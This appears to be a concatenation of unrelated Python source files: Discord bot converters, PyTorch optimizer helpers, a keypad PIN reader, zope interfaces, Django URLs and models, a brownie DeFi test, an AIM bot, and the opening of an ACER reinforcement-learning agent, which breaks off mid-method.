if unit in ["w", "wk", "wks", "week", "weeks"]:
return 604_800, "week"
if unit in ["mth", "mths", "mos", "month", "months"]:
return 2_580_000, "month"
if unit in ["y", "yr", "yrs", "year", "years"]:
return 31_390_000, "month"
else:
return None, None
async def convert(self, ctx, argument):
reg = re.compile("([0-9]+)([a-zA-Z]+)")
time, unit = reg.match(argument).groups()
unit_time, unit_name = self.unit_getter(unit.lower())
seconds = unit_time * time
return Time(unit_name, unit_time, time, seconds)
class IntentionalMember(commands.converter.MemberConverter):
async def query_member_named(self, guild, argument):
cache = guild._state.member_cache_flags.joined
if len(argument) > 5 and argument[-5] == '#':
username, _, discriminator = argument.rpartition('#')
members = await guild.query_members(username, limit=100, cache=cache)
return discord.utils.get(members, name=username, discriminator=discriminator)
else:
return None
async def convert(self, ctx, argument: str) -> discord.Member:
bot = ctx.bot
match = self._get_id_match(argument) or re.match(r'<@!?([0-9]{15,20})>$', argument)
guild = ctx.guild
user_id = None
if match is None:
# not a mention...
if guild:
result = await self.query_member_named(guild, argument)
else:
result = commands.converter._get_from_guilds(bot, 'get_member_named', argument)
else:
user_id = int(match.group(1))
if guild:
result = guild.get_member(user_id) or discord.utils.get(ctx.message.mentions, id=user_id)
else:
result = commands.converter._get_from_guilds(bot, 'get_member', user_id)
if result is None:
if guild is None:
raise commands.errors.MemberNotFound(argument)
if user_id is not None:
result = await self.query_member_by_id(bot, guild, user_id)
else:
result = await self.query_member_named(guild, argument)
if not result:
raise commands.errors.MemberNotFound(argument)
return result
class IntentionalUser(commands.converter.UserConverter):
async def convert(self, ctx: commands.Context, argument: str) -> discord.User:
match = self._get_id_match(argument) or re.match(r'<@!?([0-9]{15,20})>$', argument)
state = ctx._state
if match is not None:
user_id = int(match.group(1))
result = ctx.bot.get_user(user_id) or discord.utils.get(ctx.message.mentions, id=user_id)
if result is None:
try:
result = await ctx.bot.fetch_user(user_id)
except discord.HTTPException:
raise commands.errors.UserNotFound(argument) from None
return result
arg = argument
# Remove the '@' character if this is the first character from the argument
if arg[0] == '@':
# Remove first character
arg = arg[1:]
# check for discriminator if it exists,
if len(arg) > 5 and arg[-5] == '#':
discrim = arg[-4:]
name = arg[:-5]
predicate = lambda u: u.name == name and u.discriminator == discrim
result = discord.utils.find(predicate, state._users.values())
if result is not None:
return result
raise commands.errors.UserNotFound(argument)
class CustomMenu(menus.MenuPages):
@menus.button('\N{WASTEBASKET}\ufe0f', position=menus.Last(3))
async def do_trash(self, _):
self.stop()
await self.message.delete()
def stop(self):
self.call_end_event()
super().stop()
async def finalize(self, timed_out):
self.call_end_event()
def call_end_event(self):
self.bot.dispatch('finalize_menu', self.ctx)
TimestampStyle = Literal['f', 'F', 'd', 'D', 't', 'T', 'R']
def format_dt(dt: datetime.datetime, /, style: Optional[TimestampStyle] = None) -> str:
if style is None: return f'<t:{int(dt.timestamp())}>'
return f'<t:{int(dt.timestamp())}:{style}>'
def user_friendly_dt(dt: datetime.datetime):
return format_dt(dt, style='f') + f' ({format_dt(dt, style="R")})'
|
import torch.optim as optim
def get_optimizer(parameters, optim_args):
"""Get a PyTorch optimizer for params.
Args:
parameters: Iterator of network parameters to optimize (i.e., model.parameters()).
optim_args: Command line arguments.
Returns:
PyTorch optimizer specified by args_.
"""
if optim_args.optimizer == 'sgd':
optimizer = optim.SGD(parameters, optim_args.lr,
momentum=optim_args.sgd_momentum,
weight_decay=optim_args.weight_decay,
dampening=optim_args.sgd_dampening)
elif optim_args.optimizer == 'adam':
optimizer = optim.Adam(parameters, optim_args.lr,
betas=(optim_args.adam_beta_1, optim_args.adam_beta_2), weight_decay=optim_args.weight_decay)
else:
raise ValueError('Unsupported optimizer: {}'.format(optim_args.optimizer))
return optimizer
def get_scheduler(optimizer, optim_args):
"""Get a learning rate scheduler.
Args:
optimizer: The optimizer whose learning rate is modified by the returned scheduler.
args: Command line arguments.
Returns:
PyTorch scheduler that update the learning rate for `optimizer`.
"""
if optim_args.lr_scheduler is None:
scheduler = None
elif optim_args.lr_scheduler == 'step':
scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=optim_args.lr_decay_step, gamma=optim_args.lr_decay_gamma)
elif optim_args.lr_scheduler == 'multi_step':
scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=optim_args.lr_milestones, gamma=optim_args.lr_decay_gamma)
elif optim_args.lr_scheduler == 'plateau':
scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer,
factor=optim_args.lr_decay_gamma,
patience=optim_args.lr_patience,
min_lr=[pg['lr'] * 1e-3 for pg in optimizer.param_groups])
else:
raise ValueError('Invalid learning rate scheduler: {}.'.format(optim_args.scheduler))
return scheduler
def step_scheduler(lr_scheduler, metrics, lr_step, best_ckpt_metric='stanford-valid_loss'):
"""Step a LR scheduler.
Args:
lr_scheduler: Scheduler to step.
metrics: Dictionary of metrics.
lr_step: Number of times step_scheduler has been called.
best_ckpt_metric: Name of metric to use to determine the best checkpoint.
"""
if lr_scheduler is not None:
lr_step += 1
if isinstance(lr_scheduler, optim.lr_scheduler.ReduceLROnPlateau):
if best_ckpt_metric in metrics:
lr_scheduler.step(metrics[best_ckpt_metric], epoch=lr_step)
else:
raise ValueError(f"Chose {best_ckpt_metric} metric which is not in metrics.")
else:
lr_scheduler.step(epoch=lr_step)
return lr_step
|
from gpiozero import MCP3008
from time import sleep
# Class
class PinPad:
# initialisation of class
def __init__(self, pin_digit_count=4, max_voltage=3.3):
self.pin_digit_count = pin_digit_count
self.max_voltage = max_voltage
self.keypad_adc_row_list = []
self.invalid_pin_digits = ['A', 'B', 'C', 'D', '*', '#']
self.keypad_matrix = [['1', '2', '3', 'A'],
['4', '5', '6', 'B'],
['7', '8', '9', 'C'],
['*', '0', '#', 'D']]
# setup MCP3008 instance for each pin pad row (left column 0.25 * VDD, right column 1 * VDD)
for row in range(4):
self.keypad_adc_row_list.append(MCP3008(max_voltage=self.max_voltage, channel=row))
# close MCP3008 instances
def close(self):
for row in range(4):
self.keypad_adc_row_list[row].close()
# get state of key
# returns true if given key has been pressed, false otherwise
def is_key_pressed(self, key, debug=False):
key_state = False
row = 0
for row_digit_list in self.keypad_matrix: # loop through rows
if key in row_digit_list:
column = row_digit_list.index(key) # get column if key exists in pin pad row
break
row += 1 # increment for next row list,
row_level = self.keypad_adc_row_list[row].value
# if voltage level of row matches column
if row_level > ((column + 1) * 0.2) and row_level < ((column + 2) * 0.2):
if debug:
print(key, row + 1, column + 1, row_level)
key_state = True
sleep(0.5)
return key_state
# get pressed key
# returns pressed key
def get_key(self, debug=False):
key = ""
# loop through row at get voltage level as value of column
for row in range(len(self.keypad_adc_row_list)):
column = 0
row_level = self.keypad_adc_row_list[row].value
if row_level > 0.2: # voltage devider at 0.25 * VDD
column += 1
if row_level > 0.4: # voltage devider at 0.5 * VDD
column += 1
if row_level > 0.6: # voltage devider at 0.75 * VDD
column += 1
if row_level > 0.8: # voltage devider at 1 * VDD
column += 1
if column > 0: # 0 means no key found. Array index starts at 0. To access array, decrement column.
key = self.keypad_matrix[row][column - 1] # get key from matrix
if debug:
print(key, row_level)
sleep(0.5) # simple debouncing
return key # return pressed key
# get pin
# returns entered pin
def get_pin(self, debug=False):
pin = ""
digit_count = 0
while digit_count < self.pin_digit_count: # loop until all keys have been entered
key = self.get_key(debug) # get pressed key
if key is '*': # if * pressed, cancel pin input procedure
pin = ""
break
if key in self.invalid_pin_digits: # allow only numerical keys
key = ""
if key: # if key pressed, add digit to pin string
digit_count += 1
pin = pin + key
return pin # return pin string
# main as example, will be ignored if imported as library
if __name__ == "__main__":
expected_pin = "1234"
entered_pin = ""
try:
pin_pad = PinPad()
print("Enter * to continue...")
while True:
if pin_pad.is_key_pressed('*'):
break
while True:
print("Enter pin:")
entered_pin = pin_pad.get_pin(debug=True)
print(entered_pin)
if expected_pin == entered_pin:
break
except KeyboardInterrupt:
pass
pin_pad.close()
print("Program exit.")
|
##############################################################################
# Copyright (c) 2020 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
##############################################################################
"""
Interface definitions for builtin types.
After this module is imported, the standard library types will declare
that they implement the appropriate interface.
.. versionadded:: 5.0.0
"""
from __future__ import absolute_import
from zope.interface import classImplements
from zope.interface.common import collections
from zope.interface.common import numbers
from zope.interface.common import io
__all__ = [
'IList',
'ITuple',
'ITextString',
'IByteString',
'INativeString',
'IBool',
'IDict',
'IFile',
]
# pylint:disable=no-self-argument
class IList(collections.IMutableSequence):
"""
Interface for :class:`list`
"""
extra_classes = (list,)
def sort(key=None, reverse=False):
"""
Sort the list in place and return None.
*key* and *reverse* must be passed by name only.
"""
class ITuple(collections.ISequence):
"""
Interface for :class:`tuple`
"""
extra_classes = (tuple,)
class ITextString(collections.ISequence):
"""
Interface for text (unicode) strings.
On Python 2, this is :class:`unicode`. On Python 3,
this is :class:`str`
"""
extra_classes = (type(u'unicode'),)
class IByteString(collections.IByteString):
"""
Interface for immutable byte strings.
On all Python versions this is :class:`bytes`.
Unlike :class:`zope.interface.common.collections.IByteString`
(the parent of this interface) this does *not* include
:class:`bytearray`.
"""
extra_classes = (bytes,)
class INativeString(IByteString if str is bytes else ITextString):
"""
Interface for native strings.
On all Python versions, this is :class:`str`. On Python 2,
this extends :class:`IByteString`, while on Python 3 it extends
:class:`ITextString`.
"""
# We're not extending ABCInterface so extra_classes won't work
classImplements(str, INativeString)
class IBool(numbers.IIntegral):
"""
Interface for :class:`bool`
"""
extra_classes = (bool,)
class IDict(collections.IMutableMapping):
"""
Interface for :class:`dict`
"""
extra_classes = (dict,)
class IFile(io.IIOBase):
"""
Interface for :class:`file`.
It is recommended to use the interfaces from :mod:`zope.interface.common.io`
instead of this interface.
On Python 3, there is no single implementation of this interface;
depending on the arguments, the :func:`open` builtin can return
many different classes that implement different interfaces from
:mod:`zope.interface.common.io`.
"""
try:
extra_classes = (file,)
except NameError:
extra_classes = ()
|
import numpy as np
import torch
from PIL import Image
def imcascade(*imgs, savepath=None):
# imgs -- multiple pytorch tensors or numpy tensors
# pick the image which is the smallest, and resize the others to match it (can be arbitrary image shape here)
assert(isinstance(imgs[0], (np.ndarray, torch.Tensor)))
if torch.is_tensor(imgs[0]):
imgs = list(map(lambda x: x.cpu().numpy(), imgs))
if isinstance(imgs[0], np.ndarray):
imgs = [Image.fromarray(x.astype(np.uint8)) for x in imgs]
min_shape = sorted([(np.sum(i.size), i.size) for i in imgs])[0][1]
imgs_comb = np.hstack((np.asarray(i.resize(min_shape).convert('L')) for i in imgs))
imgs_comb = Image.fromarray(imgs_comb.astype(np.uint8))
if savepath:
imgs_comb.save(savepath)
return imgs_comb
|
from .analyzer import AnomalyAnalyzer
from .manager import AnomalyManager
from .storage import AnomalyStorage
from .generalanomaly import GeneralAnomaly
__all__ = (
'AnomalyAnalyzer',
'AnomalyManager',
'AnomalyStorage',
'GeneralAnomaly',
)
|
from django.conf.urls import patterns, url, include
from .views.staffing import (change_staffing_acl, change_staffing_acl_vendors,
search_vendors_and_people)
from .views.projects import (create_proposed_resource, delete_proposed_resource, edit_proposed_resource,
change_proposed_status, proposed_resource_details, remove_proposed_resource)
urlpatterns = patterns('projects.views',
url(r'^search/$', search_vendors_and_people, name='search'),
url('(?P<request_pk>\d+)/propose/$', create_proposed_resource,
name='propose'),
url('(?P<request_pk>\d+)/acl/$', change_staffing_acl,
name='change_acl'),
url('(?P<request_pk>\d+)/acl/vendors/$', change_staffing_acl_vendors,
name='change_acl_vendors'),
url('proposed/(?P<pk>\d+)/delete/$', delete_proposed_resource,
name='delete_proposed_resource'),
url('proposed/(?P<pk>\d+)/edit/$', edit_proposed_resource,
name='edit_proposed'),
url(r'^proposed/(?P<pk>\d+)/status/$',
change_proposed_status,
name='change_proposed_status'
),
url('proposed/(?P<pk>\d+)/$', proposed_resource_details,
name='proposed_resource_details'
),
url('proposed/(?P<pk>\d+)/remove/$', remove_proposed_resource,
name='remove_proposed_resource'
),
url(r'^r/', include('projects.requests_urls',
namespace='requests')),
)
|
from ..models import Record
from .base import BaseRepository
class RecordsRepository(BaseRepository):
__model__ = Record
|
import pytest
from brownie import interface
import brownie
def setup_uniswap(admin, alice, bank, werc20, urouter, ufactory, celo, cusd, ceur, chain, UniswapV2Oracle, UniswapV2SpellV1, simple_oracle, core_oracle, oracle):
spell = UniswapV2SpellV1.deploy(bank, werc20, urouter, celo, {'from': admin})
cusd.mint(admin, 10000000 * 10**6, {'from': admin})
ceur.mint(admin, 10000000 * 10**6, {'from': admin})
cusd.approve(urouter, 2**256-1, {'from': admin})
ceur.approve(urouter, 2**256-1, {'from': admin})
urouter.addLiquidity(
cusd,
ceur,
1000000 * 10**6,
1000000 * 10**6,
0,
0,
admin,
2**256-1,
{'from': admin},
)
lp = ufactory.getPair(cusd, ceur)
print('admin lp bal', interface.IERC20(lp).balanceOf(admin))
uniswap_lp_oracle = UniswapV2Oracle.deploy(core_oracle, {'from': admin})
print('ceur Px', simple_oracle.getCELOPx(ceur))
print('cusd Px', simple_oracle.getCELOPx(cusd))
core_oracle.setRoute([cusd, ceur, lp], [simple_oracle, simple_oracle,
uniswap_lp_oracle], {'from': admin})
print('lp Px', uniswap_lp_oracle.getCELOPx(lp))
oracle.setTokenFactors(
[cusd, ceur, lp],
[
[10000, 10000, 10000],
[10000, 10000, 10000],
[10000, 10000, 10000],
],
{'from': admin},
)
cusd.mint(alice, 10000000 * 10**6, {'from': admin})
ceur.mint(alice, 10000000 * 10**6, {'from': admin})
cusd.approve(bank, 2**256-1, {'from': alice})
ceur.approve(bank, 2**256-1, {'from': alice})
return spell
def execute_uniswap_werc20(admin, alice, bank, token0, token1, spell, ufactory, pos_id=0):
spell.getAndApprovePair(token0, token1, {'from': admin})
lp = ufactory.getPair(token0, token1)
spell.setWhitelistLPTokens([lp], [True], {'from': admin})
bank.setWhitelistSpells([spell], [True], {'from': admin})
bank.setWhitelistTokens([token0, token1], [True, True], {'from': admin})
tx = bank.execute(
pos_id,
spell,
spell.addLiquidityWERC20.encode_input(
token0, # token 0
token1, # token 1
[
40000 * 10**6, # 40000 ceur
50000 * 10**6, # 50000 cusd
0,
1000 * 10**6, # 1000 ceur
200 * 10**6, # 200 cusd
0, # borrow LP tokens
0, # min ceur
0, # min cusd
],
),
{'from': alice}
)
|
from django.contrib import admin
from .models import CustomerReportTemplate
class CustomerReportTemplateAdmin(admin.ModelAdmin):
search_fields = [
'template_name',
]
list_display = [
'template_name',
'customer_id'
]
admin.site.register(CustomerReportTemplate, CustomerReportTemplateAdmin)
|
#coding: utf-8
from django.db import models
# Create your models here.
class IDC(models.Model):
name = models.CharField(max_length=20, verbose_name=u'机房名称')
type = models.CharField(max_length=10, verbose_name=u'机房类型')
ips = models.CharField(max_length=60, verbose_name=u'公网IP地址')
address = models.CharField(max_length=60, verbose_name=u'机房地址')
contact = models.CharField(max_length=40, verbose_name=u'联系方式')
def __unicode__(self):
return self.name
class Meta:
verbose_name = u'机房列表'
verbose_name_plural = u'机房列表'
class Server(models.Model):
name = models.CharField(max_length=30, verbose_name=u'名称')
ip = models.GenericIPAddressField(unique=True, verbose_name=u'IP地址')
brand = models.CharField(max_length=30, verbose_name=u'品牌')
model = models.CharField(max_length=30, verbose_name=u'型号')
sn = models.CharField(max_length=30, verbose_name=u'序列号')
location = models.CharField(max_length=30, verbose_name=u'机架位置')
system = models.CharField(max_length=30, verbose_name=u'系统环境')
idc_name = models.ForeignKey(IDC,verbose_name=u'所属机房')
def __unicode__(self):
return self.name
class Meta:
verbose_name = u'服务器列表'
verbose_name_plural = u'服务器列表'
class Host(models.Model):
name = models.CharField(max_length=30, verbose_name=u'主机名')
ip = models.GenericIPAddressField(unique=True, verbose_name=u'IP地址')
group = models.ManyToManyField('Group',blank=True ,verbose_name=u'所属组')
app = models.CharField(max_length=20, verbose_name=u'功能说明')
status = models.BooleanField(default='true',verbose_name=u'使用状态')
server_name = models.ForeignKey(Server, verbose_name=u'所属服务器')
def __unicode__(self):
return self.name
class Meta:
verbose_name = u'主机列表'
verbose_name_plural = u'主机列表'
class Group(models.Model):
name = models.CharField(max_length=30,unique=True)
def __unicode__(self):
return self.name
class Meta:
verbose_name = u'主机组信息'
verbose_name_plural = u'主机组列表'
class Host_Detail(models.Model):
manufacturer = models.CharField(max_length=20,blank=True, verbose_name=u'厂商')
productname = models.CharField(max_length=30,blank=True, verbose_name=u'产品型号')
service_tag = models.CharField(max_length=80,blank=True, unique=True, verbose_name=u'序列号')
cpu_model = models.CharField(max_length=50,blank=True,verbose_name=u'CPU型号')
cpu_nums = models.PositiveSmallIntegerField(blank=True,null=True,verbose_name=u'CPU线程数')
cpu_groups = models.PositiveSmallIntegerField(null=True,blank=True,verbose_name=u'CPU物理核数')
mem = models.CharField(max_length=100,blank=True,verbose_name=u'内存大小')
disk = models.CharField(max_length=300,blank=True,verbose_name=u'硬盘大小')
hostname = models.CharField(max_length=30,blank=True,verbose_name=u'主机名')
ip = models.GenericIPAddressField(unique=True,verbose_name=u'IP地址')
ip2 = models.GenericIPAddressField(unique=True,null=True,blank=True, verbose_name=u'其他IP地址')
os = models.CharField(max_length=20,blank=True,verbose_name=u'操作系统')
def __unicode__(self):
return self.ip
class Meta:
verbose_name = u'主机详细信息'
verbose_name_plural = u'主机详细信息列表'
class Network(models.Model):
name = models.CharField(max_length=30, verbose_name=u'名称')
brand = models.CharField(max_length=30,blank=True, verbose_name=u'品牌')
model = models.CharField(max_length=30,blank=True, verbose_name=u'型号')
ip_out = models.GenericIPAddressField(unique=True,null=True,blank=True,verbose_name=u'外网IP地址')
ip_in = models.GenericIPAddressField(unique=True,null=True,blank=True, verbose_name=u'内网IP地址')
info = models.CharField(max_length=100,blank=True, verbose_name=u'说明')
url = models.URLField(max_length=100, blank=True,verbose_name=u'访问地址')
idc_name = models.ForeignKey(IDC,verbose_name=u'所属机房')
def __unicode__(self):
return self.name
class Meta:
verbose_name = u'网络设备'
verbose_name_plural = u'网络设备列表'
# saltstack功能相关
class Salt_Server(models.Model):
idc = models.ForeignKey(IDC,verbose_name=u'所属机房')
ip = models.GenericIPAddressField(verbose_name=u'服务器IP')
port = models.IntegerField(verbose_name=u'端口号')
url = models.URLField(blank=True,verbose_name=u'URL地址')
username = models.CharField(max_length=20, verbose_name=u'用户名')
password = models.CharField(max_length=50,verbose_name=u'密码')
def __unicode__(self):
return self.ip
class Meta:
verbose_name = u'Salt服务器'
verbose_name_plural = u'Salt服务器列表'
#https://docs.saltstack.com/en/latest/ref/modules/all/index.html
class Salt_Module(models.Model):
name = models.CharField(unique=True,max_length=20,verbose_name=u'Salt模块')
info = models.TextField(max_length=200,verbose_name=u'模块说明')
url = models.URLField(blank=True,verbose_name=u'官网链接')
def __unicode__(self):
return self.name
class Meta:
verbose_name = u'Salt模块'
verbose_name_plural = u'Salt模块列表'
class Salt_Command(models.Model):
cmd = models.CharField(unique=True,max_length=40,verbose_name=u'Salt命令')
module = models.ForeignKey(Salt_Module,verbose_name=u'所属模块')
info = models.TextField(max_length=400,verbose_name=u'命令说明')
def __unicode__(self):
return self.cmd
class Meta:
verbose_name = u'Salt命令'
verbose_name_plural = u'Salt命令列表'
class Salt_Function(models.Model):
name = models.CharField(max_length=20,unique=True,verbose_name=u'功能名称')
cmd = models.ForeignKey(Salt_Command,verbose_name=u'Salt命令')
args = models.CharField(max_length=100,blank=True,verbose_name=u'Salt命令参数')
group = models.ManyToManyField('Group',blank=True ,verbose_name=u'所属组')
info = models.TextField(max_length=200,blank=True,verbose_name=u'功能说明')
def __unicode__(self):
return self.name
class Meta:
verbose_name = u'Salt功能'
verbose_name_plural = u'Salt功能列表'
class Salt_Flow(models.Model):
name = models.CharField(max_length=20,unique=True,verbose_name=u'流程名称')
hosts = models.CharField(max_length=100,blank=True,verbose_name=u'主机列表')
funs = models.ManyToManyField(Salt_Function,verbose_name=u'功能列表')
info = models.TextField(max_length=200,verbose_name=u'流程说明')
def __unicode__(self):
return self.name
class Meta:
verbose_name = u'Salt流程'
verbose_name_plural = u'Salt流程列表'
class Upload(models.Model):
username = models.CharField(max_length = 30,verbose_name=u'用户')
headImg = models.FileField(upload_to = './upload/',verbose_name=u'文件路径')
date = models.DateTimeField(auto_now_add=True,verbose_name=u'上传时间')
#存放的并非用户上传的文件本身,而是文件的存放路径。
def __unicode__(self):
return self.headImg
class Meta:
verbose_name = u'文件上传'
verbose_name_plural = u'文件上传' |
#!/usr/local/bin/python
########################################################
#
# File: AwayBot.py
# Author: Jamie Turner <[email protected]>
# Date: 4/11/02
#
# Description:
#
# Weird little bot that sets its away message
# according to viewers incoming IMs.
#
from toc import TocTalk
import time
class AwayBot(TocTalk):
#whenever someone IMs us
def on_IM_IN(self,data):
# get the screenname to IM back--
# and the message to set as our away
screenname = data.split(":")[0]
message = self.strip_html(":".join(data.split(":")[2:]) )
# first, clear it
self.do_SET_AWAY("")
# delay
time.sleep(2)
# thank them
self.do_SEND_IM(screenname,
"Thanks for giving me an idea for my away message!" )
# delay
time.sleep(2)
# set the away message accordingly
self.do_SET_AWAY(
'''<B>%s</B> offered this: "<I>%s</I>"''' % (screenname,message) )
# if this file is run directly
if __name__ == "__main__":
# create the bot, specify some AIM account to use
bot = AwayBot("IMscreenname", "somepass")
# Py-TOC will use this var as our info
bot._info = \
"Hi, I'm an away message bot. IM me something clever and I'll use it as my away message."
# Start it up. We never return from this
bot.go()
|
from __future__ import unicode_literals
from mopidy import backend as backend_api
from mopidy_spotify_tunigo import backend, library
class TestSpotifyTunigoBackend(object):
def get_backend(self, config):
return backend.SpotifyTunigoBackend(config=config, audio=None)
def test_uri_schemes(self, config):
backend = self.get_backend(config)
assert 'spotifytunigo' in backend.uri_schemes
def test_init_sets_up_the_providers(self, config):
backend = self.get_backend(config)
assert isinstance(
backend.library, library.SpotifyTunigoLibraryProvider)
assert isinstance(backend.library, backend_api.LibraryProvider)
|
from dqo.db.models import Table, Column, DataType, Database, ColumnStats, NumericStats
def employees_db_w_meta() -> Database:
table_employees = Table("employees",
[
Column("id", DataType.STRING, stats=ColumnStats(int(1e6), 0, int(1e6), True)),
Column("salary", DataType.NUMBER, stats=ColumnStats(int(1e6), 10, int(1e5))),
Column("dept", DataType.STRING, stats=ColumnStats(int(1e6), 100, 100)),
Column("company", DataType.STRING, stats=ColumnStats(int(1e6), 0, 3)),
Column("name", DataType.STRING, stats=ColumnStats(int(1e6), 0, int(1e5))),
Column("active", DataType.BOOL, stats=ColumnStats(int(1e6), 0, 2))
])
table_departments = Table("departments",
[
Column("id", DataType.NUMBER, stats=ColumnStats(100, 0, 100, True)),
Column("name", DataType.STRING, stats=ColumnStats(100, 0, 100))
])
table_companies = Table("companies",
[
Column("id", DataType.NUMBER, stats=ColumnStats(3, 0, 3, True)),
Column("name", DataType.STRING, stats=ColumnStats(3, 0, 3))
])
return Database([
table_employees,
table_departments,
table_companies
])
def employees2_db_w_meta() -> Database:
table_employees = Table("employees",
[
Column("id", DataType.STRING, stats=ColumnStats(int(1e6), 0, int(1e6), True)),
Column("salary", DataType.FLOAT,
stats=ColumnStats(
total=int(1e6), nulls=10, distinct=int(1e5),
values=NumericStats(min=1.0, max=100.0, mean=50, variance=0.1, skewness=0.1, kurtosis=0.1, freq=[],
hist=[])
)),
Column("date", DataType.TIME,
stats=ColumnStats(
total=int(1e6), nulls=10, distinct=int(1e5),
values=NumericStats(
min=1279568347, max=1410661888, mean=50, variance=0.1, skewness=0.1, kurtosis=0.1,
freq=[],
hist=[])
)),
])
table_departments = Table("departments",
[
Column("id", DataType.NUMBER, stats=ColumnStats(100, 0, 100, True)),
Column("name", DataType.STRING, stats=ColumnStats(100, 0, 100))
])
table_companies = Table("companies",
[
Column("id", DataType.NUMBER, stats=ColumnStats(3, 0, 3, True)),
Column("name", DataType.STRING, stats=ColumnStats(3, 0, 3))
])
return Database([
table_employees,
table_departments,
table_companies
])
def imdb_db_w_meta() -> Database:
aka_name = Table("aka_name",
[
Column("id", DataType.NUMBER, stats=ColumnStats(int(1e6), 0, int(1e6), True)),
Column("person_id", DataType.NUMBER, stats=ColumnStats(int(1e6), 0, int(1e6), True)),
Column("imdb_index", DataType.STRING, stats=ColumnStats(int(1e6), 10, int(1e5))),
Column("surname_pcode", DataType.STRING, stats=ColumnStats(int(1e6), 0, int(1e5)))
])
comp_cast_type = Table("comp_cast_type",
[
Column("id", DataType.NUMBER, stats=ColumnStats(int(1e6), 0, int(1e6), True)),
Column("name", DataType.STRING, stats=ColumnStats(100, 0, 100))
])
company_name = Table("company_name",
[
Column("id", DataType.NUMBER, stats=ColumnStats(int(1e6), 0, int(1e6), True)),
Column("md5sum", DataType.STRING, stats=ColumnStats(3, 0, 3)),
Column("name", DataType.STRING, stats=ColumnStats(3, 0, 3))
])
info_type = Table("info_type",
[
Column("id", DataType.NUMBER, stats=ColumnStats(int(1e6), 0, int(1e6), True)),
Column("name", DataType.STRING, stats=ColumnStats(3, 0, 3)),
Column("info", DataType.STRING, stats=ColumnStats(3, 0, 3)),
])
keyword = Table("keyword",
[
Column("id", DataType.NUMBER, stats=ColumnStats(int(1e6), 0, int(1e6), True)),
Column("name", DataType.STRING, stats=ColumnStats(3, 0, 3)),
Column("phonetic_code", DataType.STRING, stats=ColumnStats(3, 0, 3))
])
movie_info = Table("movie_info",
[
Column("id", DataType.NUMBER, stats=ColumnStats(int(1e6), 0, int(1e6), True)),
Column("name", DataType.STRING, stats=ColumnStats(3, 0, 3)),
Column("movie_id", DataType.NUMBER, stats=ColumnStats(3, 0, 3))
])
movie_info_idx = Table("movie_info_idx",
[
Column("id", DataType.NUMBER, stats=ColumnStats(int(1e6), 0, int(1e6), True)),
Column("name", DataType.STRING, stats=ColumnStats(3, 0, 3)),
Column("info_type_id", DataType.NUMBER, stats=ColumnStats(int(1e6), 0, int(1e6), True)),
])
movie_keyword = Table("movie_keyword",
[
Column("id", DataType.NUMBER, stats=ColumnStats(int(1e6), 0, int(1e6), True)),
Column("name", DataType.STRING, stats=ColumnStats(3, 0, 3)),
Column("movie_id", DataType.NUMBER, stats=ColumnStats(3, 0, 3))
])
movie_link = Table("movie_link",
[
Column("id", DataType.NUMBER, stats=ColumnStats(int(1e6), 0, int(1e6), True)),
Column("linked_movie_id", DataType.NUMBER, stats=ColumnStats(3, 0, 3)),
Column("movie_id", DataType.NUMBER, stats=ColumnStats(3, 0, 3))
])
role_type = Table("role_type",
[
Column("id", DataType.NUMBER, stats=ColumnStats(int(1e6), 0, int(1e6), True)),
Column("name", DataType.STRING, stats=ColumnStats(3, 0, 3))
])
return Database([
aka_name,
comp_cast_type,
company_name,
movie_info,
movie_info_idx,
movie_keyword,
movie_link,
role_type,
info_type,
keyword
])
|
import time
from torch.distributions import Categorical
import torch
from torch import nn
import copy
import gym
import numpy as np
from collections import deque
import pytorch_drl.utils.model_utils as model_utils
from pytorch_drl.algs.base import Agent
from pytorch_drl.utils.memory.buffer import EpisodicBuffer
from pytorch_drl.utils.shared_optim import AdamShared
import torch.multiprocessing as mp
class ACER_Agent(mp.Process):
def __init__(self,
network=None,
average_model=None,
queue=None,
net_constr=None,
net_args=None,
env_name=None,
env_constr=None,
env_args=None,
gamma=0.99,
replay_n=4,
lr=None,
n_env=8,
normalize_rewards=False,
polyak_alpha=0.99,
trpo_theta=1,
use_trpo=True,
entropy_coefficient=1e-4,
memory_size_steps=100_000,
max_episodes=1_000,
max_episode_length=200,
max_traj_length=100,
start_off_policy=2000,
clip=10,
batch_size=16,
max_grad_norm=None,
seed=0,
mp_id=-1,
optimizer=None
):
super().__init__()
self.max_episodes = max_episodes
self.net_constr = net_constr
self.trpo_theta = trpo_theta
self.clip = clip
self.net_args = net_args
self.env_name = env_name
self.max_traj_length = max_traj_length
self.gamma = gamma
self.polyak_alpha = polyak_alpha
self.replay_n = replay_n
self.lr = lr
self.entropy_coefficient = entropy_coefficient
self.device = "cpu"
self.normalize_rewards = normalize_rewards
self.use_trpo = use_trpo
self.max_grad_norm = max_grad_norm
self.queue = queue
self.n_env = n_env
self.mp_id = mp_id
self.shared_model = network
self.average_model = average_model
self.max_episode_length = max_episode_length
self.start_off_policy = start_off_policy
self.n_eps = 1e-10 # epsilon for log, div
self.model = copy.deepcopy(self.shared_model)
self.optimizer = optimizer
memory_size = memory_size_steps // max_traj_length // n_env
self.buffer = EpisodicBuffer(memory_size, seed,
self.device, batch_size)
self.env = env_constr(*env_args)
self.state = self.env.reset()
self.episode_t = 0
self.episode_score = 0
# Collects an episode and returns
# the data in the same format as buffer.sample
def collect_episode(self):
states, actions, rewards, policies, dones = [], [], [], [], []
for i in range(self.max_traj_length-1):
self.episode_t += 1
state_th = torch.from_numpy(self.state)\
.float().unsqueeze(0).to(self.device)
policy, q_value = self.model(state_th)
action = Categorical(policy).sample().item()
next_state, reward, done, _ = self.env.step(action)
done = done or (self.episode_t > self.max_episode_length)
states.append(self.state)
actions.append(action)
rewards.append(reward)
dones.append(done)
policies.append(policy.squeeze(0).detach().cpu().numpy())
self.state = next_state
self.episode_score += reward
if done or self.episode_t > self.max_episode_length:
self.episode_t = 0
self.state = self.env.reset()
self.queue.put(self.episode_score)
self.episode_score = 0
states.append(self.state)
episode = [states, actions, rewards, policies, dones]
return self.buffer.add(episode)
def learn(self, offline=True):
self.model.load_state_dict(self.shared_model.state_dict())
eps = self.n_eps
